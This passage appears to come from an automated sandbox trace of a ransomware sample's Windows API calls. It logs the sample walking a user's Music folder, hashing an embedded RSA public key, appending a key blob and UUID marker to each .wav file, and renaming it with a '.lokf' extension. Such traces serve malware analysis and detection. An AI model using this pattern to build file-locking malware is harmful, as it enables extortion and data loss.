lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaa6b0c0, ftCreationTime.dwHighDateTime=0x1d4d275, ftLastAccessTime.dwLowDateTime=0xe6521790, ftLastAccessTime.dwHighDateTime=0x1d4cb32, ftLastWriteTime.dwLowDateTime=0xe6521790, ftLastWriteTime.dwHighDateTime=0x1d4cb32, nFileSizeHigh=0x0, nFileSizeLow=0x17639, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lOMYgti3I.wav", cAlternateFileName="LOMYGT~1.WAV")) returned 1 [0060.505] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\lOMYgti3I.wav") returned=".wav" [0060.505] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\lOMYgti3I.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\lomygti3i.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.505] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=95801) returned 1 [0060.505] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.507] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x17613, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.507] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.508] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x17639, lpOverlapped=0x0) returned 1 [0060.508] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.508] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.509] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.509] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8478) returned 1 [0060.509] CryptCreateHash (in: hProv=0x6b8478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.509] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.509] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.509] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.509] GetLastError () returned 0x0 [0060.509] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.509] CryptReleaseContext (hProv=0x6b8478, dwFlags=0x0) returned 1 [0060.509] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.510] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.510] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.510] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.510] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.510] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.511] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x17639, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.511] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.511] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0060.511] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.511] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.511] CloseHandle (hObject=0x5cc) returned 1 [0060.512] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\lOMYgti3I.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\lomygti3i.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\lOMYgti3I.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\lomygti3i.wav.lokf")) returned 1 [0060.513] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.513] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.513] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.514] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.514] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb499f670, ftCreationTime.dwHighDateTime=0x1d4d143, ftLastAccessTime.dwLowDateTime=0xbcaeb4a0, ftLastAccessTime.dwHighDateTime=0x1d4ca44, ftLastWriteTime.dwLowDateTime=0xbcaeb4a0, ftLastWriteTime.dwHighDateTime=0x1d4ca44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ULJQyyPz2Ie5aZRk", cAlternateFileName="ULJQYY~1")) returned 1 [0060.514] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262c78 [0060.514] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.514] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262f18 [0060.514] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.514] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262c78 | out: hHeap=0x660000) returned 1 [0060.514] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12dccbd0, ftCreationTime.dwHighDateTime=0x1d4ccf9, ftLastAccessTime.dwLowDateTime=0x12ef6800, ftLastAccessTime.dwHighDateTime=0x1d4cfef, ftLastWriteTime.dwLowDateTime=0x12ef6800, ftLastWriteTime.dwHighDateTime=0x1d4cfef, nFileSizeHigh=0x0, nFileSizeLow=0x10d9c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WQ3CvenEAYLHrobZJZN.wav", cAlternateFileName="WQ3CVE~1.WAV")) returned 1 [0060.514] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.514] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.514] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8478 | out: hHeap=0x660000) returned 1 [0060.514] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\WQ3CvenEAYLHrobZJZN.wav") returned=".wav" [0060.514] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\WQ3CvenEAYLHrobZJZN.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\wq3cveneaylhrobzjzn.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.514] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=69020) returned 1 [0060.514] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.516] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10d76, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.517] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.517] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.517] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.517] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.517] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x10d9c, lpOverlapped=0x0) returned 1 [0060.518] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.518] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.518] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.518] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.518] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8478) returned 1 [0060.518] CryptCreateHash (in: hProv=0x6b8478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.519] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.519] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.519] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.519] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.519] GetLastError () returned 0x0 [0060.519] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.519] CryptReleaseContext (hProv=0x6b8478, dwFlags=0x0) returned 1 [0060.519] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.519] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.519] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.519] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.519] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.519] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.519] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.519] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10da0) returned 0x9c8bae8 [0060.519] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.519] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.519] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.519] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.519] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.519] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.519] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89520 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e60 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89568 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e78 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ea8 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ec0 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.520] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.520] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ea8 | out: hHeap=0x660000) returned 1 [0060.520] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ec0 | out: hHeap=0x660000) returned 1 [0060.520] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.520] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.520] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85ec0 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85ea8 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.520] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.520] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.520] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ec0 | out: hHeap=0x660000) returned 1 [0060.520] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.520] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ea8 | out: hHeap=0x660000) returned 1 [0060.520] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.520] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.520] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.521] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.521] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.521] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.521] GetCurrentThreadId () returned 0x9e0 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8aeb0 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.521] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.521] GetCurrentThreadId () returned 0x9e0 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.521] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.521] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.521] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.521] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.521] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.521] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ea8 [0060.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85ec0 [0060.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e90 [0060.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0060.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.522] 